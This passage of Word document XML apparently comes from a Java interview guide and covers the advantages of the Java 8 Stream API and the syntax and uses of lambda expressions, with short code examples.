      </w:r>
    </w:p>
    <w:p w14:paraId="632C80C8"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n -&gt; n * 2)           // This also won't execute yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D556B12"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  // Terminal operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F97965"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lazy nature makes streams efficient because unnecessary operations are not performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2C1BA"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Chaining Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBED296" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ream API allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where multiple operations can be applied in a single pipeline without the need for temporary variables. This makes the code cleaner and eliminates the need to write additional loops or intermediary steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1B269"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624651E4"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Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC07976"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79007157"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21090FC4"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orted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEA11A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67468E"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haining operations with streams is easier to read compared to managing the state and flow of the program manually in a for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A5C79"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7. Error Handling (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A7235" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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reams, when used with Optional, provide a more structured and elegant way to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null value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error scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, compared to the traditional use of null checks in a for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C5CCF"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 with Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9126ED"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ptional&lt;Integer&gt; firstEven = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F0EA3"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26317A6D"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ndFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53328110"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rstEven.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E1801"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use of Optional avoids the need for explicit null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BCC5D"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8. Better Code Maintenance and Testability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BB1C6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ecause stream operations are typically </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smaller</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focused</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, they tend to be easier to maintain and test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FD64B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Operations are more focused on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you want to do rather than </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do it, leading to easier refactoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CBB28"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9. Convenience for Working with Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4EB69" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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reams make it easy to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including filtering, mapping, reducing, etc., without writing loops explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7FAFA" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>collectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gather results in custom ways (e.g., toMap(), groupingBy(), etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74242EF2"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p>
    <w:p w14:paraId="2B29E9EF"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p&lt;Integer, List&lt;String&gt;&gt; grouped = list.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02003E95"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groupingBy(String::length));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D9BEA" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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4B860AE">
          <v:rect id="_x0000_i1695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E034C48"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 of Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9242B1" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ise and readable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391566A7" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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upport for parallel processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FF328" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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unctional programming style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEFFAE1" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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voiding side effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478702A" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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azy evaluation and optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73E0B6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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haining operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07807DB6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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tter error handling with Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67636F8E" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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mproved testability and maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB7C84" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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venience for complex collection operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4BD4D"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verall, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a more modern, efficient, and readable approach to handling collections, especially when compared to traditional for loops, making it easier to write functional-style code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0AB8A" w14:textId="4643707C" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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9A0BB70">
          <v:rect id="_x0000_i1696" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F6891" w14:textId="77777777" w:rsidR="002E2A9A" w:rsidRPr="00CE4B95" w:rsidRDefault="002E2A9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Toc196307708"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the lambda expression in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w14:paraId="60F0FCD7" w14:textId="2740FB53" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature that allows you to express instances of single-method interfaces (functional interfaces) more concisely. It enables you to treat functionality as a method argument, or to create a small function that can be passed around. Lambda expressions are a way to provide clear and concise syntax for writing functional code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820BA92"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yntax of Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA22D2F"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basic syntax of a lambda expression is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC3C1D"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arameters) -&gt; expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0EC9" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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rameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The input parameters of the lambda expression (like method parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2FE60" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ow (-&gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The arrow separates the parameters and the body of the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA57C0B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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pression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The body of the lambda expression can be a single expression or a block of statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394A3A9"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2857795D"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A simple lambda expression that adds two integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7BF13"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 a, int b) -&gt; a + b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA1105"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ponents of a Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBD3D7" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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rameter List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The parameters of the lambda expression (optional type declaration, can be inferred by the compiler).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAD604" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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ow Token (-&gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This separates the parameter list from the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F13B69" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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ody</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can either be a single expression or a block of code. If it's a single expression, the result is returned automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80EA75"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1: Simple Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF7701"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Using a lambda to implement the Runnable interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E751570"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unnable r = () -&gt; System.out.println("Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC44CBD"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run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0F3D0"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 the Runnable interface is a functional interface with a single abstract method run(). The lambda expression () -&gt; System.out.println("Hello, World!") provides the implementation of that method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32561D7F"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2: Lambda Expression with Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB66E0D"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A lambda that takes two integers and adds them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8A530"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iFunction&lt;Integer, Integer, Integer&gt; add = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D612AD"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add.apply(5, 3));  // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24977AF3"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 the lambda expression (a, b) -&gt; a + b implements the BiFunction interface, which takes two parameters and returns a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625478BE"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3: Lambda with Type Inference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA90144"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You don't need to explicitly declare the types of parameters, as the compiler can infer the types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26B4A"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Lambda expression with inferred types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFACAB3"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nction&lt;String, Integer&gt; stringLength = s -&gt; s.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F268B"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stringLength.apply("Lambda"));  // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB68387"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4: Lambda with Block of Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0B492"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body of the lambda expression has more than one statement, you need to use curly braces {} and explicitly use the return statement if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C3FC5"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Lambda expression with multiple statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A756CA"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iFunction&lt;Integer, Integer, Integer&gt; multiply = (a, b) -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B93E47"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result = a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496FACB"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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FFEC9"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97E31F9"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multiply.apply(4, 5));  // Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FE5D6"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dvantages of Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39312E6A" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ore concise and readable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminates the need for boilerplate code such as anonymous classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE7306" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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nables functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows functions to be passed as arguments or returned from methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F70D7" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102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mproved use of collections and streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Works seamlessly with the Stream API introduced in Java 8, making it easy to process data in a functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38C2C4"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Use Cases for Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294D12B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ssing behavior as parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, passing sorting or filtering logic to methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72290AC0" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ocessing collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In combination with the Stream API, lambda expressions simplify operations like filtering, mapping, and reducing collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E676E" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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vent handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions are commonly used in GUI applications to handle events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122AE39"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Using Lambda with Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A826A37"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String&gt; list = Arrays.asList("Apple", "Banana", "Cherry");</w:t>
      </w:r>
    </w:p>
